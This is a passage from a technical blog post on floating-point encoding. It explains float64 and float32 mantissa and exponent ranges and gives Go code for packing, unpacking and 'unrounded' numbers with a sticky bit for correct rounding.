Using this notation, <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math> means <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>≤</mo><mi>m</mi><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup></mrow></math>.]
<p>
In addition to limiting the mantissa size, we must also limit the exponent,
to keep the overall number a fixed size.
For float64s, assuming <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math>, the exponent <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1074</mn><mo>,</mo><mn>971</mn><mo stretchy=false>]</mo></mrow></math>.
<p>
A float64 consists of 1 sign bit, 11 exponent bits, and 52 mantissa bits.
The <i>normal</i> 11-bit exponent encodings <code>0x001</code> through <code>0x3fe</code> denote <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>1074</mn></mrow></math> through <math><mrow><mi>e</mi><mo>=</mo><mn>971</mn></mrow></math>.
For those, the mantissa <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math>,
and it is encoded into only 52 bits by omitting the leading 1 bit.
The special exponent encoding <code>0x3ff</code> is used for infinity and not-a-number.
That leaves the encoding <code>0x000</code>, which is also special.
It denotes <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>1074</mn></mrow></math> (like <code>0x001</code> does)
but with mantissas <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo stretchy=false>)</mo></mrow></math> without an implicit leading 1.
These <i>subnormals</i> or <i>denormalized numbers</i> [<a class=footref id='fnref-8' href='#fn-8'>8</a>]
continue the fixed-point <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>1074</mn></mrow></msup></mrow></math> scale down to zero,
which ends up encoded (not coincidentally) as 64 zero bits.
<p>
Other definitions of floating point numbers use different interpretations.
For example the IEEE754 standard uses
<math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math> with <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1023</mn><mo>,</mo><mn>1023</mn><mo stretchy=false>]</mo></mrow></math>,
while the C standard libary <i>frexp</i> function uses <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>½</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math> with <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1022</mn><mo>,</mo><mn>1024</mn><mo stretchy=false>]</mo></mrow></math>.
Both of these choices make <math><mi>m</mi></math> itself a fixed-point number instead of an integer.
Our integer definition lets us use integer math.
These interpretations are all equivalent and differ only by a constant added to <math><mi>e</mi></math>.
<p>
This description of float64s applies to float32s as well, but with different constants. This table summarizes the two encodings:<style>
#_table1 td:nth-child(2) { text-align: center }
#_table1 td:nth-child(3) { text-align: center }
</style>
<table class=md id=_table1>
<tr class=th><th></th><th>float32</th><th>float64</th></tr>
<tr><td>sign bits</td><td>1</td><td>1</td></tr>
<tr><td>encoded mantissa bits</td><td>23</td><td>52</td></tr>
<tr><td>encoded exponent bits</td><td>8</td><td>11</td></tr>
<tr><td>exponent range for <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>127</mn><mo>,</mo><mn>127</mn><mo stretchy=false>]</mo></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1023</mn><mo>,</mo><mn>1023</mn><mo stretchy=false>]</mo></mrow></math></td></tr>
<tr><td>exponent range for integer <math><mi>m</mi></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>150</mn><mo>,</mo><mn>104</mn><mo stretchy=false>]</mo></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1074</mn><mo>,</mo><mn>971</mn><mo stretchy=false>]</mo></mrow></math></td></tr>
<tr><td>normal numbers</td><td><math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>23</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>24</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>150</mn><mo>,</mo><mn>104</mn><mo stretchy=false>]</mo></mrow></msup></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1074</mn><mo>,</mo><mn>971</mn><mo stretchy=false>]</mo></mrow></msup></mrow></math></td></tr>
<tr><td>subnormal numbers</td><td><math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>23</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>150</mn></mrow></msup></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>1074</mn></mrow></msup></mrow></math></td></tr>
<tr><td>exponent range for 64-bit <math><mi>m</mi></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>190</mn><mo>,</mo><mn>64</mn><mo stretchy=false>]</mo></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1085</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math></td></tr>
<tr><td>normal numbers</td><td><math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>190</mn><mo>,</mo><mn>64</mn><mo stretchy=false>]</mo></mrow></msup></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1085</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></msup></mrow></math></td></tr>
<tr><td>subnormal numbers</td><td><math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>190</mn></mrow></msup></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>1085</mn></mrow></msup></mrow></math></td></tr>
</table>
<p>
To convert a float64 to its bits, we use Go’s <a href="https://go.dev/pkg/math/#Float64bits"><code>math.Float64bits</code></a>.
<div class=showcode><pre><span class=showcode-comment>// unpack64 returns m, e such that f = m * 2**e.</span>
<span class=showcode-comment>// The caller is expected to have handled 0, NaN, and ±Inf already.</span>
<span class=showcode-comment>// To unpack a float32 f, use unpack64(float64(f)).</span>
func unpack64(f float64) (uint64, int) {
const shift = 64 - 53
const minExp = -(1074 + shift)
b := math.Float64bits(f)
m := 1<<63 | (b&(1<<52-1))<<shift
e := int((b >> 52) & (1<<shift - 1))
if e == 0 {
m &^= 1 << 63
e = minExp
s := 64 - bits.Len64(m)
return m << s, e - s
}
return m, (e - 1) + minExp
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L23-L38">fpfmt/fpfmt.go:23,38</a></div><div class=showcode-end></div>
<p>
To convert back, we use Go’s <a href="https://go.dev/pkg/math/#Float64frombits"><code>math.Float64frombits</code></a>.
<div class=showcode><pre><span class=showcode-comment>// pack64 takes m, e and returns f = m * 2**e.</span>
<span class=showcode-comment>// It assumes the caller has provided a 53-bit mantissa m</span>
<span class=showcode-comment>// and an exponent that is in range for the mantissa.</span>
func pack64(m uint64, e int) float64 {
if m&(1<<52) == 0 {
return math.Float64frombits(m)
}
return math.Float64frombits(m&^(1<<52) | uint64(1075+e)<<52)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L41-L48">fpfmt/fpfmt.go:41,48</a></div><div class=showcode-end></div>
<p>
[Other presentations use “fraction” and “significand” instead of “mantissa”.
This post uses mantissa for consistency with my 2011 post
and because I generally agree with Agatha Mallett’s excellent
“<a href="https://geometrian.com/projects/blog/in-defense-of-mantissa.html">In Defense of ‘Mantissa’</a>”.]
<a class=anchor href="#unrounded_numbers"><h2 id="unrounded_numbers">Unrounded Numbers</h2></a>
<p>
Floating-point operations are defined as if computed exactly to infinite precision
and then rounded to the nearest actual floating-point number,
breaking ties by rounding to an even mantissa.
Of course, real implementations don’t use infinite precision;
they only keep enough precision to round properly.
We will use the same idea.
In our algorithms, we want the scaling operation to eventually evaluate to an integer,
but we want to give the caller control over the rounding step.
So instead of returning an integer, we will return an <i>unrounded number</i>,
which contains all the information needed to round it in a variety of ways.
<p>
The unrounded form of any real number <math><mi>x</mi></math>, which we will write as as <math><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow></math>,
is the truncated integer part of <math><mi>x</mi></math> followed by two more bits.
Those bits indicate (1) whether the fractional part of <math><mi>x</mi></math> was at least ½, and (2) whether the fractional part was not exactly 0 or ½.
If you think of <math><mi>x</mi></math> as a real number written in binary, the first extra bit is the bit immediately after the “binary point”—the bit that represents <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>1</mn></mrow></msup></mrow></math>, aka the ½ bit—and the second extra bit is the OR of all the bits after the ½ bit.
<p>
This definition applies even to numbers that require an infinite binary representation.
For example, just as 1/3 requires an infinite decimal representation ‘<math><mrow><mn>0.333</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /></mrow></math>’,
1.6 requires an infinite binary representation ‘<math><mrow><mn>1.1001100110011</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /></mrow></math>’.
The unrounded version <math><mrow><mtext>⟨</mtext><mn>1.6</mn><mtext>⟩</mtext></mrow></math> is finite: ‘<math><mn>1.11</mn></math>’.
But instead of reading unrounded numbers in binary,
let’s print <math><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow></math> as <math><mrow><mtext>‘</mtext><mtext><i>n</i></mtext><mn>.</mn><mtext><i>hs</i></mtext><mtext>’</mtext></mrow></math> where <math><mtext><i>n</i></mtext></math> is the integer part <math><mrow><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>>></MO><mn>2</mn></mrow></math>,
<math><mtext><i>h</i></mtext></math> is 0 or 5, and <math><mtext><i>s</i></mtext></math> is ‘+’ when the second bit is 1.
Then <math><mrow><mtext>⟨</mtext><mn>1.6</mn><mtext>⟩</mtext></mrow></math> is written ‘<math><mrow><mn>1.5</mn><mtext>+</mtext></mrow></math>’.<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><MO>|</MO><mo stretchy=false>(</mo><mn>4</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6</mn><mspace width='0.166em' /><mtext>exactly⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>24</mn><mo>=</mo><mtext>‘</mtext><mn>6.0</mn><mtext>’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.000001</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>25</mn><mo>=</mo><mtext>‘</mtext><mn>6.0</mn><mtext>+’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.499999</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>25</mn><mo>=</mo><mtext>‘</mtext><mn>6.0</mn><mtext>+’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.5</mn><mspace width='0.166em' /><mtext>exactly⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>26</mn><mo>=</mo><mtext>‘</mtext><mn>6.5</mn><mtext>’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.500001</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>27</mn><mo>=</mo><mtext>‘</mtext><mn>6.5</mn><mtext>+’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.999999</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>27</mn><mo>=</mo><mtext>‘</mtext><mn>6.5</mn><mtext>+’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>7</mn><mspace width='0.166em' /><mtext>exactly⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>28</mn><mo>=</mo><mtext>‘</mtext><mn>7.0</mn><mtext>’</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
Let’s implement unrounded numbers in Go.
<div class=showcode><pre>type unrounded uint64
func unround(x float64) unrounded {
return unrounded(math.Floor(4*x)) | bool2[unrounded](math.Floor(4*x) != 4*x)
}
func (u unrounded) String() string {
return fmt.Sprintf("⟨%d.%d%s⟩", u>>2, 5*((u>>1)&1), "+"[1-u&1:])
}
</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L52-L60">fpfmt/fpfmt.go:52,60</a></div><div class=showcode-end></div>
<p>
The <code>bool2</code> function converts a boolean to an integer.
(The Go compiler will implement this using an inlined conditional move.)
<div class=showcode><pre><span class=showcode-comment>// bool2 converts b to an integer: 1 for true, 0 for false.</span>
func bool2[T ~int | ~uint64](b bool) T {
if b {
return 1
}
return 0
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L15-L20">fpfmt/fpfmt.go:15,20</a></div><div class=showcode-end></div>
<p>
We won’t use the <code>unround</code> constructor in our actual code, but it’s helpful for playing.
For example, we can try the examples we just saw:
<pre class='language-in'>row("x", "raw", "str")
for _, x := range []float64{6, 6.001, 6.499, 6.5, 6.501, 6.999, 7} {
u := unround(x)
row(x, uint64(u), u)
}
table()
</pre>
<pre class='language-out'>x raw str
6 24 ⟨6.0⟩
6.001 25 ⟨6.0+⟩
6.499 25 ⟨6.0+⟩
6.5 26 ⟨6.5⟩
6.501 27 ⟨6.5+⟩
6.999 27 ⟨6.5+⟩
7 28 ⟨7.0⟩
</pre>
<p>
The unrounded form <math><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow></math> holds the information needed by all the usual rounding operations.
Adding 0, 1, 2, or 3 and then dividing by four (or shifting right by two) yields: floor, round with ½ rounding down, round with ½ rounding up, and ceiling.
In floating-point math, we want to round with ½ rounding to even, meaning 1½ and 2½ both round to 2.
We can do that by adding <math><mrow><mn>1</mn><mo>+</mo><mtext>odd</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math>,
where <math><mrow><mtext>odd</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> is 0 or 1 according to whether <math><mi>x</mi></math> is odd.
That’s just the low bit of <math><mi>x</mi></math>:
<math><mrow><mtext>odd</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo><mo>=</mo><mo stretchy=false>(</mo><mi>x</mi><MO>&</MO><mn>1</mn><mo stretchy=false>)</mo><mo>=</mo><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>>></MO><mn>2</mn><mo stretchy=false>)</mo><MO>&</MO><mn>1</mn></mrow></math>.
<p>
Putting that all together:<div class=math><math display=block><mtable><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>⌊</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>⌋</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>0</mn><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>(floor)</mtext></mtd></mtr><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msup><mrow><mo>[</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>]</mo></mrow><mo>−</mo></msup></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>1</mn><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(round,</mtext><mspace width='0.3em' /><mtext>half</mtext><mspace width='0.3em' /><mtext>down)</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msup><mrow><mo>[</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>]</mo></mrow><mtext>even</mtext></msup></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>1</mn><mo>+</mo><mtext>odd</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(round,</mtext><mspace width='0.3em' /><mtext>half</mtext><mspace width='0.3em' /><mtext>to</mtext><mspace width='0.3em' /><mtext>even)</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>1</mn><mo>+</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>>></MO><mn>2</mn><mo stretchy=false>)</mo><MO>&</MO><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd><mrow></mrow></mtd></mtr><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msup><mrow><mo>[</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>]</mo></mrow><mo>+</mo></msup></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>2</mn><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(round,</mtext><mspace width='0.3em' /><mtext>half</mtext><mspace width='0.3em' /><mtext>up)</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>⌈</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>⌉</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mo>+</mo><mn>3</mn><mo stretchy=false>)</mo><MO>>></MO><mn>2</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>(ceiling)</mtext></mtd></mtr></mtable></math></div>
<p>
In Go:
<div class=showcode><pre>func (u unrounded) floor() uint64 { return uint64((u + 0) >> 2) }
func (u unrounded) roundHalfDown() uint64 { return uint64((u + 1) >> 2) }
func (u unrounded) round() uint64 { return uint64((u + 1 + (u>>2)&1) >> 2) }
func (u unrounded) roundHalfUp() uint64 { return uint64((u + 2) >> 2) }
func (u unrounded) ceil() uint64 { return uint64((u + 3) >> 2) }</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L62-L65">fpfmt/fpfmt.go:62,65</a></div><div class=showcode-end></div>
<pre class='language-in'>row("x", "floor", "round½↓", "round", "round½↑", "ceil")
for _, x := range []float64{6, 6.25, 6.5, 6.75, 7, 7.5, 8.5} {
u := unround(x)
row(u, u.floor(), u.roundHalfDown(), u.round(), u.roundHalfUp(), u.ceil())
}
table()
</pre>
<pre class='language-out'>x floor round½↓ round round½↑ ceil
⟨6.0⟩ 6 6 6 6 6
⟨6.0+⟩ 6 6 6 6 7
⟨6.5⟩ 6 6 6 7 7
⟨6.5+⟩ 6 7 7 7 7
⟨7.0⟩ 7 7 7 7 7
⟨7.5⟩ 7 7 8 8 8
⟨8.5⟩ 8 8 8 9 9
</pre>
<p>
Dividing unrounded numbers preserves correct rounding as long as the second extra bit
is maintained correctly: once it is set to 1, it has to stay a 1 in all future results.
This gives the second extra bit its shorter name: the <i>sticky bit</i>.
<p>
To divide an unrounded number, we do a normal divide but force the sticky bit to 1
when there is a remainder.
Right shift does the same.<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mi>x</mi><mn>/</mn><mi>n</mi><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><mn>/</mn><mi>n</mi><mo stretchy=false>)</mo><MO>|</MO><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>mod</MO><mi>n</mi><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><MO>|</MO><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>&</MO><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mi>x</mi><MO>>></MO><mi>n</mi><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>>></MO><mi>n</mi><mo stretchy=false>)</mo><MO>|</MO><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>n</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><MO>|</MO><mo stretchy=false>(</mo><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>&</MO><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd></mtr></mtable></math></div>
<p>
For example, if we rounded 15.4 to an integer 15 and then divided it by 6,
we’d get 2.5, which rounds down to 2,
but the more precise answer would be 15.4/6 = 2.57, which rounds up to 3.
An unrounded division handles this correctly:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>15.4</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>61</mn><mspace width='0.3em' /><mo>‘</mo><mn>15.0</mn><mtext>+</mtext><mo>’</mo><mrow><mspace width='0.3em' /><mtext>“a</mtext><mspace width='0.3em' /><mtext>little</mtext><mspace width='0.3em' /><mtext>more</mtext><mspace width='0.3em' /><mtext>than</mtext><mspace width='0.3em' /><mtext>15”</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>15.4/6</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>11</mn><mspace width='0.3em' /><mo>‘</mo><mn>2.5</mn><mtext>+</mtext><mo>’</mo><mrow><mspace width='0.3em' /><mtext>“a</mtext><mspace width='0.3em' /><mtext>little</mtext><mspace width='0.3em' /><mtext>more</mtext><mspace width='0.3em' /><mtext>than</mtext><mspace width='0.3em' /><mtext>2½”</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo>[</mo><mrow><mtext>⟨</mtext><mn>15.4/6</mn><mtext>⟩</mtext></mrow><mo>]</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mn>3</mn></mtd></mtr></mtable></math></div>
<p>
Let’s implement division and right shift in Go:
<div class=showcode><pre>func (u unrounded) div(d uint64) unrounded {
x := uint64(u)
return unrounded(x/d) | u&1 | bool2[unrounded](x%d != 0)
}
func (u unrounded) rsh(s int) unrounded {
return u>>s | u&1 | bool2[unrounded](u&((1<<s)-1) != 0)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L69-L75">fpfmt/fpfmt.go:69,75</a></div><div class=showcode-end></div>
<pre class='language-in'>u := unround(15.1).div(6)
fmt.Println(u, u.round())
</pre>
<pre class='language-out'>⟨2.5+⟩ 3
</pre>
<p>
